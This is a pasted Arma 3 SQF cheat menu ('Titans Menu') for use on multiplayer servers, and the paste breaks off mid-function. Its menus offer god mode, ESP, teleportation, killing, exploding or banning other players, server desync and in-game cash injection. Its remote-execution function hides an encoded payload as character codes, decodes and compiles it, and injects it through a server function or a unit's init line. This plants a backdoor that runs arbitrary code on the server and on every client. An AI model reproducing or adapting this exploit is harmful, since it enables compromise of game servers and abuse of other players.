Guest User


a guest
May 26th, 2015
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text 231.05 KB | None | 0 0
  3. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  4. [] spawn {
  5. [] spawn {
  6. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  7. while{true} do {
  8. onMapSingleClick '_fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};if(_alt) then {(vehicle player) setpos _pos;hint "Teleported!";};false';
  9. };
  10. };
  11. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  12. if(!isNil "GEF_curCheatMenu") exitwith {};
  13. GEF_curCheatMenu = "GEF_Menu_Main";
  14. GEF_lastSelPlr = "";
  15. GEF_lastChatText = "";
  17. GEF_Menu_Title = [
  18. ["=== Main Menu ===","GEF_Menu_Main","",false,true,false,""],
  19. ["=== Target Menu ===","GEF_Menu_Target","",false,true,false,""],
  20. ["=== All Menu ===","GEF_Menu_All","",false,true,false,""],
  21. ["=== Misc Menu ===","GEF_Menu_Misc","",false,true,false,""],
  22. ["=== Morph Menu ===","GEF_Menu_Morph","",false,true,false,""],
  23. ["=== Life Menu ===","GEF_Menu_Life","",false,true,false,""]
  24. ];
  25. GEF_Menu_Divider = [
  26. ["====== Titans Menu ======","","",true,false,false,""]
  27. ];
  29. GEF_Menu_Main = GEF_Menu_Title + GEF_Menu_Divider + [
  30. ["God Mode","GEF_God","",false,false,true,"GEF_god_TOGGLE"],
  31. ["ESP","GEF_Esp","",false,false,true,"GEF_ESP_TOGGLE"], //--
  32. ["PLAYER Markers","OQrv8OYvXgQjIh2aFY5q_Mapesp","",false,false,true,"GEF_Markers_TOGGLE"], //--
  33. ["Fly Mode","LY_fly","",false,false,true,"LY_BelieveIcanFly"], //--
  34. ["No Clip","GEF_NoClip","",false,false,true,"GEF_NoClip_Toggle"], //--
  35. ["Invisible","GEF_Invisible","",false,false,true,"GEF_Invisible_Toggle"],
  36. ["Lower Terrain","GEF_Terrain","",false,false,true,"GEF_Terrain_Toggle"], //--
  37. ["Rapid Fire","GEF_RapidFire","",false,false,true,"GEF_RapidFire_Toggle"],
  38. ["No Recoil","GEF_NoRecoil","",false,false,true,"GEF_NoRecoil_Toggle"],
  39. ["Unlimited Ammo","GEF_UnlimitedAmmo","",false,false,true,"GEF_UnlimitedAmmo_Toggle"],
  40. ["Vehicle Speedhack","GEF_SpeedHack","",false,false,true,"GEF_VehicleSpeedhack_Toggle"],
  41. ["Vehicle Godmode","GEF_VehGod","",false,false,true,"GEF_VEHgod_TOGGLE"],
  42. ["Bullet Tracers","GEF_Tracers","",false,false,true,"GEF_TracerGEF_Toggle"], //--
  43. ["Test Remote Execution","GEF_Rmote","",false,false,false,""] //--
  44. ];
  45. GEF_Menu_Target = GEF_Menu_Title + GEF_Menu_Divider + [
  46. ["Kill Target","GEF_KillTarget","target",false,false,false,""],
  47. ["Neutralize Target","GEF_NeutralizeTarget","target",false,false,false,""],
  48. ["Sheep Bomb Target","GEF_SheepBombTarget","target",false,false,false,""],
  49. ["Mine Target","GEF_MineTarget","target",false,false,false,""],
  50. ["Rainbow Target","GEF_RainBowTarget","target",false,false,false,""],
  51. ["Lightning Strike Target","GEF_LightningStrikeTarget","target",false,false,false,""],
  52. ["Teleport to Target","GEF_TPTOTarget","target",false,false,false,""],
  53. ["Teleport Target Here","GEF_TPTargetTO","target",false,false,false,""],
  54. ["Lock Target","GEF_LockTarget","target",false,false,false,""],
  55. ["Unlock Target","GEF_UnlockTarget","target",false,false,false,""],
  56. ["Spectate Target","GEF_SpectateTarget","target",false,false,false,""],
  57. ["Explode Target","GEF_ExplodeTarget","target",false,false,false,""],
  58. ["Fuck Up Target","GEF_FuckTarget","target",false,false,false,""],
  59. ["Paradrop Target","GEF_Paradrop","target",false,false,false,""],
  60. ["Infect Target (Scroll Menu)","GEF_Infect","target",false,false,false,""],
  61. ["========= Weapon Kits =========","","",true,false,false,""],
  62. ["Cop","Kit_Cop","target",false,false,false,""],
  63. ["Assault","Kit_Assault","target",false,false,false,""],
  64. ["Heavy","Kit_Heavy","target",false,false,false,""],
  65. ["DMR","Kit_DMR","target",false,false,false,""],
  66. ["LLR","Kit_LLR","target",false,false,false,""],
  67. ["Sniper","Kit_Sniper","target",false,false,false,""],
  68. ["Light","Kit_Sub","target",false,false,false,""],
  69. ["Diver","Kit_Diver","target",false,false,false,""],
  70. ["UAV Controller","Kit_UAV","target",false,false,false,""]
  71. ];
  72. GEF_Menu_All = GEF_Menu_Title + GEF_Menu_Divider + [
  73. ["Kill All","GEF_KillAll","",false,false,false,""],
  74. ["ODST Drop","GEF_ODST","",false,false,false,""],
  75. ["Remove All Weapons","GEF_RemoveWeaponsAll","",false,false,false,""],
  76. ["Teleport All","GEF_TPAll","",false,false,false,""],
  77. ["Clean Up Server","GEF_CleanUp","",false,false,false,""]
  78. ];
  79. GEF_Menu_Misc = GEF_Menu_Title + GEF_Menu_Divider + [
  80. ["Deforestation Mode","GEF_deforestation","",false,false,true,"GEF_deforestation_toggle"],
  81. ["Map Drawing","GEF_Map_Drawing","",false,false,true,"GEF_Map_Drawing_Toggle"],
  82. ["Human Centipede","GEF_centipede","",false,false,true,"GEF_centipede_toggle"],
  83. ["Troll People","GEF_TrollPeople","",false,false,false,""],
  84. ["Defense Squad","GEF_DefenseSquad","",false,false,false,""],
  85. ["Thunder Dome","GEF_ThunderDome","",false,false,false,""],
  86. ["Spin All Buildings","GEF_SpinAllBuildings","",false,false,false,""],
  87. ["Spin CursorTarget","GEF_SpinCursorTarget","",false,false,false,""],
  88. ["Guess Who Got Hacked!","GEF_Advertise","",false,false,false,""],
  89. ["Nuke!","GEF_Nuke","",false,false,false,""],
  90. ["Rocket!","GEF_Rocket","",false,false,false,""],
  91. ["Kamakazi 50","GEF_Kamakazi_50","",false,false,false,""],
  92. ["Kamakazi 100","GEF_Kamakazi_100","",false,false,false,""],
  93. ["Kamakazi 500","GEF_Kamakazi_500","",false,false,false,""],
  94. ["News Banner","GEF_NewsBanner","",false,false,false,""],
  95. ["Desync Server","GEF_Desync","",false,false,false,""],
  96. ["A Dog is for life!","GEF_Dog","",false,false,false,""],
  97. ["Almighty Mode (PhysX Hack)","GEF_Almighty","",false,false,false,""],
  98. ["JME Fuckfest v1","GEF_Fuckfest_v1","",false,false,false,""],
  99. ["Cone Hats!","GEF_ConeHat","",false,false,false,""],
  100. ["Sack Hats!","GEF_BagHat","",false,false,false,""],
  101. ["Day Time!","GEF_TimeDay","",false,false,false,""],
  102. ["Night Time!","GEF_TimeNight","",false,false,false,""],
  103. ["Nyan Cat!","GEF_Nyan","",false,false,true,"GEF_NyanCat_Toggle"],
  104. ["Big Bullets","GEF_BBullets","",false,false,true,"GEF_BBulletGEF_Toggle"],
  105. ["========= Spawning =========","","",true,false,false,""],
  106. ["Hack Box","GEF_hackBox","",false,false,false,""],
  107. ["Jet Bus","GEF_JetBus","",false,false,false,""],
  108. ["Box Quad","GEF_BoxQuad","",false,false,false,""],
  109. ["HeliTank","GEF_HeliTank","",false,false,false,""],
  110. ["HeliBoat","GEF_HeliBoat","",false,false,false,""],
  111. ["Giant Robot","GEF_Robot","",false,false,false,""],
  112. ["Swasticopter","GEF_Swasticopter","",false,false,false,""],
  113. ["Dickopter","GEF_Dickopter","",false,false,false,""]
  115. ];
  116. GEF_Menu_Morph = GEF_Menu_Title + GEF_Menu_Divider + [
  117. ["VR: Soldier 1","GEF_Tranfos","B_Soldier_VR_F",false,false,false,""],
  118. ["VR: Soldier 2","GEF_Tranfos","O_Soldier_VR_F",false,false,false,""],
  119. ["VR: Soldier 3","GEF_Tranfos","I_Soldier_VR_F",false,false,false,""],
  120. ["VR: Soldier 4","GEF_Tranfos","C_Soldier_VR_F",false,false,false,""],
  121. ["VR: Protagonist 1","GEF_Tranfos","B_Protagonist_VR_F",false,false,false,""],
  122. ["VR: Protagonist 2","GEF_Tranfos","O_Protagonist_VR_F",false,false,false,""],
  123. ["VR: Protagonist 3","GEF_Tranfos","I_Protagonist_VR_F",false,false,false,""],
  124. ["VR: Protagonist 4","GEF_Tranfos","C_Protagonist_VR_F",false,false,false,""],
  125. ["Man: Civilian","GEF_Tranfos","C_man_1",false,false,false,""],
  126. ["Dog: Fin sand","GEF_Tranfos","Fin_sand_F",false,false,false,""],
  127. ["Dog: Fin Black White","GEF_Tranfos","Fin_blackwhite_F",false,false,false,""],
  128. ["Dog: Fin White","GEF_Tranfos","Fin_ocherwhite_F",false,false,false,""],
  129. ["Dog: Fin Tricolour","GEF_Tranfos","Fin_tricolour_F",false,false,false,""],
  130. ["Dog: Alsatian Sand","GEF_Tranfos","Alsatian_Sand_F",false,false,false,""],
  131. ["Dog: Alsatian Black","GEF_Tranfos","Alsatian_Black_F",false,false,false,""],
  132. ["Dog: Alsatian Sand Black","GEF_Tranfos","Alsatian_Sandblack_F",false,false,false,""],
  133. ["Animal: Goat","GEF_Tranfos","Goat_random_F",false,false,false,""],
  134. ["Animal: Sheep","GEF_Tranfos","Sheep_random_F",false,false,false,""],
  135. ["Animal: Rabbit","GEF_Tranfos","Rabbit_F",false,false,false,""],
  136. ["Animal: Hen","GEF_Tranfos","Hen_random_F",false,false,false,""],
  137. ["Animal: Cock","GEF_Tranfos","Cock_random_F",false,false,false,""],
  138. ["Animal: Snake","GEF_Tranfos","Snake_random_F",false,false,false,""],
  139. ["Animal: Turtle","GEF_Tranfos","Turtle_F",false,false,false,""]
  140. ];
  141. GEF_Menu_Life = GEF_Menu_Title + GEF_Menu_Divider + [
  142. ["Enable Instant Revive","GEF_IRevive","",false,false,false,""],
  143. ["Find Admins","GEF_FindAdmins","",false,false,false,""],
  144. ["Asylum Cash 100k","GEF_ACash","",false,false,false,""],
  145. ["Asylum Talents","GEF_Talents","",false,false,false,""],
  146. ["Ban Target","GEF_BanTarget","target",false,false,false,""],
  147. ["Life Cash 5k","GEF_Cash5k","target",false,false,false,""],
  148. ["Life Cash 10k","GEF_Cash10k","target",false,false,false,""],
  149. ["Life Cash 20k","GEF_Cash20k","target",false,false,false,""],
  150. ["Life Cash 50k","GEF_Cash50k","target",false,false,false,""],
  151. ["Life Cash 100k","GEF_Cash100k","target",false,false,false,""],
  152. ["Life Cash 500k","GEF_Cash500k","target",false,false,false,""],
  153. ["All Licenses","GEF_Licenses","",false,false,false,""],
  154. ["No Illegal Items","GEF_NoIllegal","",false,false,false,""],
  155. ["Stop Escorting","GEF_NoEscort","",false,false,false,""],
  156. ["Stop Transporting","GEF_NoTransport","",false,false,false,""],
  157. ["Stop Tazing","GEF_NoTaze","",false,false,false,""],
  158. ["Impound CursorTarget","GEF_Impound","",false,false,false,""],
  159. ["Unrestrain","GEF_Unrestrain","",false,false,false,""]
  160. ];
  162. GEF_Rmote = {
  163. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  164. if(isNil 'TY_re_onetime') then {
  165. TY_re_onetime = createMarker ["SwagMarker",[-1000,-1000]];
  166. "SwagMarker" setMarkerShape "ICON";
  167. "SwagMarker" setMarkerType "Empty";
  168. "SwagMarker" setMarkerAlpha 0;
  169. _code = '_a = toString [91,93,32,115,112,97,119,110,32,123,95,102,110,99,95,115,99,114,105,112,116,78,97,109,101,32,61,32,105,102,32,40,105,115,110,105,108,32,34,95,102,110,99,95,115,99,114,105,112,116,78,97,109,101,34,41,32,116,104,101,110,32,123,34,70,117,110,99,116,105,111,110,115,32,73,110,105,116,34,125,32,101,108,115,101,32,123,95,102,110,99,95,115,99,114,105,112,116,78,97,109,101,125,59,105,102,40,105,115,83,101,114,118,101,114,41,32,116,104,101,110,32,123,119,104,105,108,101,123,116,114,117,101,125,32,100,111,32,123,13,10,9,9,9,9,119,97,105,116,85,110,116,105,108,123,40,109,97,114,107,101,114,84,101,120,116,32,34,83,119,97,103,77,97,114,107,101,114,34,41,32,33,61,32,34,34,125,59,13,10,9,9,9,9,95,116,101,120,116,32,61,32,109,97,114,107,101,114,84,101,120,116,32,34,83,119,97,103,77,97,114,107,101,114,34,59,13,10,9,9,9,9,34,83,119,97,103,77,97,114,107,101,114,34,32,115,101,116,77,97,114,107,101,114,84,101,120,116,32,34,34,59,13,10,9,9,9,9,40,34,76,79,71,73,67,34,41,32,99,114,101,97,116,101,85,110,105,116,91,91,48,44,48,44,48,93,44,99,114,101,97,116,101,71,114,111,117,112,32,115,105,100,101,76,111,103,105,99,44,34,59,34,32,43,32,95,116,101,120,116,32,43,32,34,59,34,93,59,13,10,9,9,9,9,125,59,125,59,125,59];
  170. _b = compile _a;
  171. [] spawn _b;';
  172. if(!isNil "LIFE_fnc_MP") then {
  173. [[_code],"DB_fnc_mresToArray",false,false] call LIFE_fnc_MP;
  174. hint 'INIT LIFE RE';
  175. } else {
  176. ("LOGIC") createUnit [[0,0,0],createGroup sideLogic,";" + _code + ";"];
  177. hint 'INIT RE';
  178. };
  180. uiSleep 1;
  181. };
  182. _t = _this select 0;
  183. _target = [_this,1,"SWAGGER"] call BISHfnc_param;
  184. _text = _t;
  185. if(typename _t == typename []) then {
  186. _text = _t select 0;
  187. };
  188. if(typename _text == "CODE") then {
  189. _arr = toArray str(_text);
  190. _arr set [0,32];
  191. _arr set [count(_arr)-1,32];
  192. _text = toString _arr;
  193. };
  194. if(typename _target != "STRING") then {
  195. if(typename _target == "OBJECT") then {
  196. _netId = netId _target;
  197. _text = format[" [] spawn {_fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};if(netid player == '%2') then {%1};};",_text,_netID];
  198. } else {
  199. if(typename _target == typename true) then {
  200. if(!_target) then {
  201. _text = format[" [] spawn {_fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};if(isServer) then {%1};};",_text];
  202. } else {
  203. _text = format[" [] spawn {_fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};if(!isServer) then {%1};};",_text];
  204. };
  205. } else {
  206. _text = format[" [] spawn {_fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};%1};",_text];
  207. };
  208. };
  209. } else {
  210. _text = format[" [] spawn {_fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};%1};",_text];
  211. };
  213. "SwagMarker" setMarkerText _text;
  214. };
  215. GEF_SideCouleur = {
  216. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  217. _object = _this;
  218. _side = side _object;
  219. _color = [0,0,0,1];
  220. if(_side == east) then {
  221. _color = [1,0,0,1];
  222. };
  223. if(_side == west) then {
  224. _color = [0,0,1,1];
  225. };
  226. if(_side == CIVILIAN) then {
  227. _color = [1,1,1,1];
  228. };
  229. if(_side == INDEPENDENT) then {
  230. _color = [0,1,0,1];
  231. };
  232. _color;
  233. };
  234. GEF_SideFlag = {
  235. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  236. _object = _this;
  237. _side = side _object;
  238. _flag = "\A3\data_f\Flags\flag_white_co.paa";
  239. if(_side == east) then {
  240. _flag = "\A3\data_f\Flags\flag_red_co.paa";
  241. };
  242. if(_side == west) then {
  243. _flag = "\A3\data_f\Flags\flag_blue_co.paa";
  244. };
  245. if(_side == INDEPENDENT) then {
  246. _flag = "\A3\data_f\Flags\flag_green_co.paa";
  247. };
  248. _flag;
  249. };
  250. GEF_Tranfos = {
  251. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  252. _agent = createAgent[_this,getposatl player,[],0,"NONE"];
  253. [_agent] joinSilent (group player);
  254. _oldPlayer = player;
  255. setPlayable _agent;
  256. selectPlayer _agent;
  257. _oldPlayer disableAI "MOVE";
  258. _oldPlayer disableAI "ANIM";
  259. _oldPlayer disableAI "FSM";
  260. hint 'PLAYER MORPHED!';
  261. };
  262. GEF_ChargerCmenu = {
  263. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  264. _ctrl = _this;
  265. lbClear _ctrl;
  266. _menu = [];
  267. call compile format["_menu = %1;",GEF_curCheatMenu];
  268. {
  269. _ctrl lbAdd (_x select 0);
  270. if(_x select 3) then {
  271. _ctrl lbSetColor [(lbSize _ctrl)-1,[0,0,1,1]];
  272. };
  273. if(_x select 4) then {
  274. _ctrl lbSetColor [(lbSize _ctrl)-1,[1,1,1,0.6]];
  275. };
  276. if(_x select 5) then {
  277. _toggleVar = _x select 6;
  278. _toggle = false;
  279. call compile format["_toggle = %1;",_toggleVar];
  280. if(_toggle) then {
  281. _ctrl lbSetColor [(lbSize _ctrl)-1,[0,1,0,1]];
  282. } else {
  283. _ctrl lbSetColor [(lbSize _ctrl)-1,[1,0,0,1]];
  284. };
  285. };
  286. if((_x select 1) == "GEF_SpawnWeapon") then {
  287. _ctrl lbSetPicture [(lbSize _ctrl)-1,getText(configfile >>"cfgWeapons" >> (_x select 2) >> "picture")];
  288. };
  289. if((_x select 1) == "GEF_SpawnVehicle") then {
  290. _ctrl lbSetPicture [(lbSize _ctrl)-1,getText(configfile >>"cfgVehicles" >> (_x select 2) >> "picture")];
  291. };
  292. } forEach _menu;
  293. };
  294. GEF_ChargerCjoueur = {
  295. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  296. _ctrl = _this;
  297. lbClear _ctrl;
  298. {
  299. if(isPlayer _x && alive _x && vehicle _x != _x) then {
  300. _ctrl lbAdd (name _x);
  301. _ctrl lbSetColor [(lbSize _ctrl)-1,_x call GEF_SideCouleur];
  302. _ctrl lbSetPicture [(lbSize _ctrl)-1,(gettext (configFile >> "CfgVehicles" >> (typeof vehicle _x) >> "picture"))];
  303. };
  304. } forEach allUnits;
  305. {
  306. if(isPlayer _x && alive _x && vehicle _x == _x) then {
  307. _ctrl lbAdd (name _x);
  308. _ctrl lbSetColor [(lbSize _ctrl)-1,_x call GEF_SideCouleur];
  309. _ctrl lbSetPicture [(lbSize _ctrl)-1,_x call GEF_SideFlag];
  310. };
  311. } forEach allUnits;
  312. };
  313. GEF_MaitreChat = {
  314. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  315. disableserialization;
  316. _ctrl = _this;
  317. while{!isNull (finddisplay 602)} do {
  318. waitUntil{(isNull (finddisplay 602)) || (ctrlText _ctrl != GEF_lastChatText)};
  319. if(!isNull (finddisplay 602)) then {
  320. GEF_lastChatText = ctrltext _ctrl;
  321. };
  322. };
  323. };
  324. GEF_Demarrer = {
  325. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  326. _ctrl = _this select 0;
  327. _index = _this select 1;
  328. _menu = [];
  329. call compile format["_menu = %1;",GEF_curCheatMenu];
  330. _array = _menu select _index;
  331. _func = _array select 1;
  332. _param = _array select 2;
  333. _isSub = _array select 4;
  334. _isTitle = _array select 3;
  335. _isToggle = _array select 5;
  336. _toggleVar = _array select 6;
  338. if(_param == "target") then {_param = GEF_lastSelPlr;};
  339. if(_isTitle) exitWith {};
  340. if(_isSub) exitWith {GEF_curCheatMenu = _func;_ctrl call GEF_ChargerCmenu;};
  341. if(_isToggle) then {
  342. _toggle = false;
  343. call compile format["%1 = !%1;_toggle = %1;",_toggleVar];
  344. if(_toggle) then {
  345. _ctrl lbSetColor [(lbCurSel _ctrl),[0,1,0,1]];
  346. } else {
  347. _ctrl lbSetColor [(lbCurSel _ctrl),[1,0,0,1]];
  348. };
  349. call compile format["""%1"" spawn %2;",_param,_func];
  350. } else {
  351. call compile format["""%1"" spawn %2;",_param,_func];
  352. };
  353. if(_param == "custom") then {GEF_curCheatMenu = ("call GEF_CustomMenu");_ctrl call GEF_ChargerCmenu;};
  354. };
  355. ["Toggle Variables"] call {
  356. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  357. GEF_NyanCat_Toggle = false;
  358. GEF_BBulletGEF_Toggle = false;
  359. GEF_NoClip_Toggle = false;
  360. GEF_Invisible_Toggle = false;
  361. GEF_VehicleMarkerGEF_Toggle = false;
  362. GEF_Terrain_Toggle = false;
  363. GEF_RapidFire_Toggle = false;
  364. GEF_NoRecoil_Toggle = false;
  365. GEF_UnlimitedAmmo_Toggle = false;
  366. GEF_VehicleSpeedhack_Toggle = false;
  367. GEF_ESP_TOGGLE = false;
  368. GEF_god_TOGGLE = false;
  369. GEF_VEHgod_TOGGLE = false;
  370. GEF_MapMarkerGEF_Toggle = false;
  371. GEF_Map_Drawing_Toggle = false;
  372. GEF_Markers_TOGGLE = false;
  373. GEF_Map_Drawing_KeyDown = false;
  374. GEF_deforestation_toggle = false;
  375. LY_BelieveIcanFly = false;
  376. GEF_centipede_toggle = false;
  377. GEF_TracerGEF_Toggle = false;
  378. };
  379. };
  385. [] spawn {
  386. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  387. disableserialization;
  388. while{true} do {
  389. waituntil{!isNull (finddisplay 602)};
  390. _display = (finddisplay 602);
  391. //Get and Create Controls
  392. _background = _display ctrlCreate ["RscBackgroundGUI",-1];
  393. _hackFrame = _display ctrlCreate ["IGUIBack",1];
  394. _plrFrame = _display ctrlCreate ["IGUIBack",-1];
  395. _hackFrame2 = _display ctrlCreate ["RscFrame",-1];
  396. _plrFrame2 = _display ctrlCreate ["RscFrame",-1];
  397. _hackList = _display ctrlCreate ["RscIGUIListBox",-1];
  398. _plrList = _display ctrlCreate ["RscIGUIListBox",-1];
  399. _title = _display ctrlCreate ["RscText",-1];
  400. _RscListbox_1502 = _display ctrlCreate ["RscListbox",-1];
  401. _RscListbox_1503 = _display ctrlCreate ["RscListbox",-1];
  402. _RscText_1000 = _display ctrlCreate ["RscText",-1];
  403. _RscText_1001 = _display ctrlCreate ["RscText",-1];
  404. _RscText_1002 = _display ctrlCreate ["RscText",-1];
  405. _RscText_1003 = _display ctrlCreate ["RscText",-1];
  407. //Handle Position Variables
  408. _width = (safezonew/4);
  409. _height = (((((safezoneW / safezoneH) min 1.2) / 1.2) / 25) * 0.8)*12.2;
  410. _x = safezonex;
  411. _y = safezoney+(safezoneh - (safezoneh/1.05));
  412. _yOff = (_height/40);
  413. _xOff = (_width/40);
  415. _chatPos = ctrlPosition _chatField;
  416. _chatWidth = _chatPos select 2;
  417. _chatHeight = _chatPos select 3;
  418. _chatX = _chatPos select 0;
  419. _chatY = _chatPos select 1;
  421. _chatYoff = (_chatHeight*1.05);
  422. _btnWidth = _chatWidth / 3.1;
  423. _chatXoff = _chatWidth * 0.015;
  424. //Set Up Button Positioning
  425. _executeLocalBtn ctrlSetPosition [_chatX,_chatY - _chatYoff,_btnWidth,_chatHeight];
  426. _executeGlobalBtn ctrlSetPosition [_chatX + _btnWidth + _chatXoff,_chatY - _chatYoff,_btnWidth,_chatHeight];
  427. _executeServerBtn ctrlSetPosition [_chatX + (_btnWidth*2) + (_chatXoff*2),_chatY - _chatYoff,_btnWidth,_chatHeight];
  429. //Set Up Positioning
  430. _hackList ctrlSetPosition [_x, _y + 0.40, _width - 0.03, _height + 0.2];
  431. _plrList ctrlSetPosition [_x, _y + 0.72+ _height + _yOff, _width - 0.03, _height + 0.2];
  433. _hackFrame ctrlSetPosition [_x, _y + 0.40, _width - 0.03, _height + 0.2];
  434. _plrFrame ctrlSetPosition [_x, _y + 0.72 + _height + _yOff, _width - 0.03, _height + 0.2];
  436. _hackFrame2 ctrlSetPosition [_x, _y + 0.40, _width - 0.03, _height + 0.2];
  437. _plrFrame2 ctrlSetPosition [_x, _y + 0.72 + _height + _yOff, _width - 0.03, _height + 0.2];
  439. _RscListbox_1502 ctrlSetPosition [0.025,0.99,0.45,0.38];
  440. _RscListbox_1503 ctrlSetPosition [0.5,0.99,0.475,0.38];
  443. _RscText_1000 ctrlSetPosition [_x + 0.18, _y + 0.08, _width - 0.03, _height + 0.2]; //Text Script
  444. _RscText_1001 ctrlSetPosition [_x + 0.18, _y + 0.4 + _height + _yOff, _width - 0.03, _height + 0.2]; // Text player
  445. _RscText_1002 ctrlSetPosition [_x + 0.75, _y + 0.61 + _height + _yOff, _width - 0.03, _height + 0.2]; // Weapons
  446. _RscText_1003 ctrlSetPosition [_x + 1.25, _y + 0.61 + _height + _yOff, _width - 0.03, _height + 0.2]; // Vehicles
  448. //Change Fonts
  449. _executeLocalBtn ctrlsetfont "TahomaB";
  450. _executeGlobalBtn ctrlsetfont "TahomaB";
  451. _executeServerBtn ctrlsetfont "TahomaB";
  452. _hackList ctrlsetfont "TahomaB";
  453. _plrList ctrlsetfont "TahomaB";
  454. _title ctrlsetfont "TahomaB";
  456. //Set Up Buttons
  457. _executeLocalBtn ctrlsettext "Execute on Self";
  458. _executeServerBtn ctrlsettext "Execute on Server";
  459. _executeGlobalBtn ctrlsettext "Execute on All";
  461. //Set up Texts
  462. _RscText_1000 ctrlSetText "Scripts";
  463. _RscText_1001 ctrlSetText "Players";
  464. _RscText_1002 ctrlSetText "Weapons";
  465. _RscText_1003 ctrlSetText "Vehicles";
  467. //Set Up Title
  468. _title ctrlsetbackgroundcolor [0,0,0,0.5];
  469. _title ctrlsetforegroundcolor [0,1,1,1];
  470. _title ctrlsettextcolor [0,1,1,1];
  472. _RscText_1000 ctrlSetTextColor [0,1,1,1];
  473. _RscText_1001 ctrlSetTextColor [0,1,1,1];
  474. _RscText_1002 ctrlSetTextColor [0,1,1,1];
  475. _RscText_1003 ctrlSetTextColor [0,1,1,1];
  478. //Control Functions
  479. _hackList call GEF_ChargerCmenu;
  480. _plrList call GEF_ChargerCjoueur;
  481. _chatField spawn GEF_MaitreChat;
  483. //Control Event Handlers
  484. _RscListbox_1503 ctrlAddEventHandler ["LbDblClick",{disableserialization;_this spawn vehicle_dblclick}];
  485. _RscListbox_1502 ctrlAddEventHandler ["LbDblClick",{disableserialization;_this spawn GEF_wep_dblclick}];
  486. _hackList ctrlAddEventHandler["LBDblClick",{disableserialization;_this call GEF_Demarrer;}];
  487. _plrList ctrlAddEventHandler ["LBSelChanged",{disableserialization;GEF_lastSelPlr = (_this select 0) lbText (_this select 1);}];
  489. //Vehicle Markers
  490. _map ctrlAddEventHandler ["Draw",{
  491. _map = _this select 0;
  492. {
  493. _cfg = configFile >> "cfgVehicles" >> typeof _x;
  494. _text = format[toString[10] + "%1 (%2)",getText(_cfg >> "DisplayName"),count(crew _x)];
  495. {
  496. _text = _text + ":"+ (name _x);
  497. } forEach (crew _x);
  498. _map drawIcon [getText(_cfg >> "Icon"),_x call GEF_SideCouleur,getposatl _x,24,24,getdir _x,_text,0,0.03,"EtelkaNarrowMediumPro","right"];
  500. } forEach vehicles;
  501. }];
  502. //Player Markers
  503. _map ctrlAddEventHandler ["Draw",{
  504. _map = _this select 0;
  505. {
  506. if(vehicle _x == _x && alive _x && isPlayer _x) then {
  507. _cfg = configFile >> "cfgVehicles" >> typeof _x;
  508. _map drawIcon [getText(_cfg >> "Icon"),_x call GEF_SideCouleur,getposatl _x,24,24,getdir _x,name _x,0,0.03,"EtelkaNarrowMediumPro","right"];
  509. };
  510. } forEach allUnits;
  511. }];
  512. _executeLocalBtn buttonSetAction "[] spawn compile (ctrlText 101);";
  513. _executeGlobalBtn buttonSetAction "[ctrlText 101,true] call GEF_Rmote;";
  514. _executeServerBtn buttonSetAction "[ctrlText 101,false] call GEF_Rmote;";
  518. _plrList ctrlCommit 0;
  519. _hackList ctrlCommit 0;
  520. _title ctrlCommit 0;
  521. _executeLocalBtn ctrlCommit 0;
  522. _executeGlobalBtn ctrlCommit 0;
  523. _executeServerBtn ctrlCommit 0;
  524. _background ctrlCommit 0;
  525. _hackFrame ctrlCommit 0;
  526. _plrFrame ctrlCommit 0;
  527. _hackFrame2 ctrlCommit 0;
  528. _plrFrame2 ctrlCommit 0;
  529. _map ctrlCommit 0;
  530. _RscListbox_1502 ctrlCommit 0;
  531. _RscListbox_1503 ctrlCommit 0;
  532. _RscText_1000 ctrlCommit 0;
  533. _RscText_1001 ctrlCommit 0;
  534. _RscText_1002 ctrlCommit 0;
  535. _RscText_1003 ctrlCommit 0;
  537. _RscListbox_1503 spawn GEF_vehiclelist;
  538. _RscListbox_1502 spawn GEF_weaponlist;
  540. waitUntil{isNull (finddisplay 602)};//wait till chat is closed
  542. };
  543. };
  545. GEF_vehiclelist = {
  546. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  547. disableserialization;
  548. _ctrl = _this;
  549. if(isNil "vehicle_array") then {
  550. vehicle_array = [];
  551. _usedNames = [];
  552. _cfg = configFile >> "cfgVehicles";
  553. for "_i" from 0 to count(_cfg)-1 do {
  554. if(isNull _ctrl) exitWith {vehicle_array = nil;};
  555. _config = _cfg select _i;
  556. _cname = configName _config;
  557. _scope = getNumber(_config >> "scope");
  558. _pic = getText(_config >> "picture");
  559. _name = getText(_config >> "displayName");
  560. if(_scope == 2 && (_cname isKindOf "LandVehicle" || _cname isKindOf "Air" || _cname isKindOf "Ship") && !(_name in _usedNames) && _pic != "") then {
  562. _index = _ctrl lbAdd _name;
  563. _ctrl lbSetPicture [_index,_pic];
  564. vehicle_array pushBack _cname;
  565. _usedNames pushBack _name;
  566. };
  567. };
  568. } else {
  569. {
  570. if(isNull _ctrl) exitWith {};
  571. _config = configFile >> "cfgVehicles" >> _x;
  572. _cname = configName _config;
  573. _scope = getNumber(_config >> "scope");
  574. _pic = getText(_config >> "picture");
